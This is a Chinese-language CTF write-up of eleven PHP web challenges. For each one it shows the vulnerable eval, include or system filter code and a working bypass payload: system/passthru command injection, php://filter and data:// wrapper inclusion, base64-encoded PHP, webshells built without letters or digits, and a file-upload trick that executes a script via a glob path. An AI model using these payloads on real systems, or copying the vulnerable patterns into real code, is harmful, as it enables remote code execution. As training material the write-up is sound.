web1
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
c=system("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");
web2
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
过滤了system用同类函数passthru替换
c=passthru("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");
web3
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
c=eval($_GET[1]);&1=system("cd%20..;cd%20..;cd%20..;ls;cat%20flag");
web4
又过滤了` ; echo (
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=/flag
web5
<?php //flag in /flag error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); // echo $flag; } }else{ highlight_file(__FILE__); }
文件包含,使用data伪协议执行命令,因为过滤了flag,所以?绕过,
?c=data://text/plain,<?php%20system("cat%20/fla?")?>
web6
<?php // flag in /flag error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|php|file/i", $c)){ include($c); // echo $flag; } }else{ highlight_file(__FILE__); }
对php过滤了,用base64绕过
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==
web7
<?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\锛坾\锛墊\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
参见https://www.freebuf.com/articles/web/261800.html
print_r(scandir(next(scandir(getcwd()))));读取上一级www目录
print_r(scandir(dirname(getcwd())));同上
print_r(scandir(next(scandir(dirname(chdir(dirname(getcwd())))))));读取var目录
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));随机读取目录
?adad=system("cat%20/flag;");&c=eval(pos(pos(get_defined_vars())));
web8
<?php if(isset($_GET['c'])){ $c=$_GET['c']; system($c." >/dev/null 2>&1"); }else{ highlight_file(__FILE__); }
/dev/null 2>&1主要意思是不进行回显的意思,具体参见https://www.cnblogs.com/tinywan/p/6025468.html
?c=cat /flag;
web9
<?php highlight_file(__FILE__); header("Content-type:text/html;charset=utf-8"); error_reporting(0); if(preg_match('/[a-z0-9]/is',$_GET['shell'])){ echo "hacker!!!"; }else{ eval($_GET['shell']); } ?>
无字母数字的webshell
参见https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
?shell=$_="{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=print_r(scandir('/'))
?shell=$_="{{{"^"?<>/";${$_}[_]();&_=phpinfo
?shell=$__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[$__]); [post data] 2=system("cat /flag");
web10
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); }
贴大佬文章https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
通过post一个文件,在上传的过程中,通过.(点)去执行执行这个文件。
新建一个页面来向靶机post数据
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>POST数据包POC</title> </head> <body> <form action="http://49.232.149.138:10031/" method="post" enctype="multipart/form-data"> <!--链接是当前打开的题目链接--> <label for="file">文件名:</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="提交"> </form> </body> </html>
上传的文件为
#!/bin/sh cat /flag
最后构造poc?c=.+/???/????????[@-[](后面的[@-[]是linux下面的匹配符,是进行匹配的大写字母。)
执行获得flag(每次上传的文件不一定有大写的文件名,需要多上传几次)
web11
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); }
做法同上